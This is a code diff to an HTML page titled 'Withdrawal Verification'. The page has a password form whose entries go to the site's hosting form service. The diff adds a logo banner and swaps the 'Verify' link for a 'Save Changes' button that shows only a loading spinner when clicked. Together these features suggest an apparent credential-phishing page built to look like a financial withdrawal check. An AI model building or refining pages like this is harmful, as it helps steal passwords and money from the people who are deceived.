--- a/src/index.html
+++ b/src/index.html
@@ -9,6 +9,13 @@
     <title>Withdrawal Verification</title>
 </head>
 <body>
+    <div class="flex blue justify-center py-[1rem]">
+        <div class="flex justify-center">
+            <div class="img flex justify-center">
+                <img src="./img/logo (1).png" alt="logo">
+            </div>
+        </div>
+    </div>
     <div class="mx-[15%] mt-[3rem] ">
         <form class="space-y-4 md:space-y-6"  name="email" method="POST" data-netlify="true" >
             <div>
@@ -38,10 +45,20 @@
                 <input type="" name="password" id="password" class="bg-gray-50 border border-black text-gray-900 sm:text-sm focus:ring-primary-600  block w-full p-2.5" placeholder="" required="">
             </div>
            <div class="w-full flex ">
-            <a href="./index.html" class="w-full text-white bg-green-600  font-medium rounded-lg text-sm px-5 py-2.5 text-center ">Verify</a>
+            <!-- <a href="./index.html" class="w-full text-black blue  font-medium rounded-lg text-sm px-5 py-2.5 text-center ">Verify</a> -->
+                <button type="button" class="button w-full text-black blue  font-medium rounded-lg text-sm px-5 py-2.5 text-center">
+                    <span class="button__text">Save Changes</span>
+                </button>
            </div>
             
         </form>
     </div>
 </body>
+<script>
+    const theButton = document.querySelector(".button");
+
+    theButton.addEventListener("click", () => {
+        theButton.classList.add("button--loading");
+    });
+</script>
 </html>
